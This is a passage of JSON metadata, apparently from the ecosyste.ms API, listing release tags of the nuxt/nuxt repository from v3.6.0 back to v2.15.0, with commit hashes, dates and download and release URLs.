:"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/